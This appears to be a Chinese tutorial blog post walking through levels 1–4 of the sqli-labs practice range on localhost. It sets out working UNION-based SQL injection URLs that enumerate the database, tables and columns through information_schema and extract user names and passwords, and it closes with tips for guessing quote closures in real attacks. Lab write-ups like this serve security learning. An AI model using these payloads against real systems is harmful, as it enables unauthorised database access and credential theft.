前言

最近一段时间想切入安全领域，因为本身有做数据库运维工作，就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外，需要有个实践的环境，刚好看到sqli-lab这个靶场，就打算先用这个来学习。

安装部署

网上很多关于安装部署的教程，很简单。本人是下载PHPStudy进行部署的。由于sqli-lab是用php5版本，现在很多一体化环境（我用wamp）的php都是7版本。我试过用github上有人修改sqli-lab适配php7版本，但是不清楚为什么报错的时候不会回显，这严重影响调试，所以还是换成PHPStudy，并且切换为php5版本进行部署就好了。

Less1

进入页面测试

输入http://localhost/sqli-labs/Less-1/进入第一关，地址和读者的部署情况有关。我是直接把sqli-lab解压放到apache的www目录下。

第一关会要求我们输入一个id作为传参，我们尝试id=1的情况：

之后尝试id=2、id=3……一直到id=13，发现为空：

证明id=13不存在。

确定闭合方式

我们可以看一下php的源码，打开Less-1的index.php

可以看到红色框起来的部分，我们传入的id直接拼接到sql查询语句中。这给我们看到一个sql注入的漏洞，就是通过单引号闭合变量。例如我们传参的时候带入一个单引号， 然后通过 -- 或者 # 忽略后续的语句，就形成了sql注入。

如果我们看不到源码，怎么知道它是单引号闭合呢？漏洞都得测试出来，我们可以尝试添加单引号、括号、双引号等等方式去测试闭合情况。比如这里如果传入id=1'：

 因为多传了一个单引号，所以实际拼接的语句变成了：

SELECT * FROM users WHERE id='1'' LIMIT 0,1

这个语句多了个单引号，肯定报错了。

判断列数

接下来判断这个sql查询一共有多少列。输入：

http://localhost/sqli-labs/Less-1/?id=1' order by 1-- asd

这里通过单引号闭合，已经形成形成了注入。依次增加order by的数字，发现到order by 4的时候，出现报错：

 证明sql语句显示的只有三列。

联合注入

判断了列数后，我们看看能否通过联合查询回显数据，输入：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,2,3-- asd

可以看到第二、三列注入到“Your Login name”和“Your Password”的显示位置。我们输入id=13的原因在于之前判断了id=13是没有数据的，那回显的数据就会用union后面的数据了，如果输入id=1，那回显就是正常，而非我们想要注入的结果。这就是联合注入的关键！

查询具体的数据库名、表名、列名

联合注入成功后，其实离胜利已经很近了。接下来要把查询回显的列替换成查询数据库名、表名、列名。先查询数据库名：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,database(),3-- asd

通过回显可以看到目前查询的表在名为security的库中。

接下来查询security库中有什么表，通过information_schema的tables表可以找出来：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- asd

使用group_concat可以把全部表名显示出来。不过有时候回显的位置可能有长度限制或者显示限制，这种方式有时候不准确，所以更实在的方式是利用limit一个一个查出来：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 -- asd

当我们从limit 0,1一直到limit 3,1时，发现users这个表很可能就是包含用户名密码的表，我们要把它的数据查出来。查出来的前提是知道列名，通过information_schema的columns可查出：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- asd

通过回显看到username和password似乎就是我们想要找的两列，我们把它们查出来：

http://localhost/sqli-labs/Less-1/?id=13' union select 1,group_concat(username),group_concat(password) from security.users -- asd

至此账号密码已经查出，sql注入成功！

Less2

第二关先看php源码：

‘可以看到源码是直接对获得的id进行拼接。所以第二关连单引号闭合都不需要了。根据第一关的经验，直接输入：

http://localhost/sqli-labs/Less-2/?id=13 union select 1,group_concat(username),group_concat(password) from security.users -- asd

 

Less3

第三关同样先看php源码：

发现这次的拼接是带了但括号，所以进行变量闭合时带上括号：

http://localhost/sqli-labs/Less-3/?id=13') union select 1,group_concat(username),group_concat(password) from security.users -- asd

Less4

同样的先看源码：

这次源码对id的前后加了双引号拼接，然后外面还有一层括号。这种情况我们就加个双引号和括号去闭合：

http://localhost/sqli-labs/Less-4/?id=13") union select 1,group_concat(username),group_concat(password) from security.users -- asd

小结

第一关是很简单的注入，不过其涉及到的内容很多，刚接触sql注入的朋友可能会有点懵。确实我刚开始也有点懵，因为一般做开发、做运维的朋友不会这样去写sql语句。当概念都了解了之后，就会觉得其实也就这么回事，Less-1没什么高大上的。另外注意这个靶场环境一定要搞好，否则很可能出现输入同样的查询，得出来不一样的结果，严重影响学习和理解效率。

这几关我们都是看了源码再操作。实际进行注入攻击当然不可能看到源码去注入，所以要尝试，最好能看到报错信息来确定。比如Less3我们用单引号闭合测试：

http://localhost/sqli-labs/Less-3/?id=1'

看到这个报错信息，这里面有单引号，也有括号，那就可以确认这题的闭合是和单引号、括号相关的。这类闭合方式来来去去就那几种情况，实际攻击的时候可以都试一下，再利用返回的报错信息确认是哪种情况